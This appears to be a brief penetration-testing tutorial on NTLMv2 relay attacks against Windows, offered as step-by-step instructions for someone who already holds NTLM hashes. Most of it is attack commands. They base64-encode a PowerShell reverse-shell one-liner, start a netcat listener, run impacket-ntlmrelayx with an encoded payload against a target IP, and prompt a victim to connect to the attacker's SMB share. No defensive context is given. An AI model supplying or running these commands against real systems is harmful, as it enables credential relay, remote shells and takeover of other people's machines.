NTLMV2 relay
After you get NTLM hashes of any user if cracking of password is not feasible could be due to complexity of the password this method can be used to pass the NTLM hash to access resources in windows.
Conditions
- Major condition to perform the attack is a primary access to the machine/user
How to perfom this attack
Fllow the steps below to achive this
-
use this Powershell one liner to set the reverseShell.
-
Use below command to encode it in base64
echo '<Powershell one liner>' | base64
- setup listner for reverse shell from the attack
sudo nc -nvlp 80
- Use impacket-ntlmrelayx to perform the relay attack an
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.1.1 -c "powershell -enc GNsaWVudCA9IE5ldy1PYmplY3Q..."
- try to connect from the victim machine to the attack machine
dir \\192.168.10.5\testing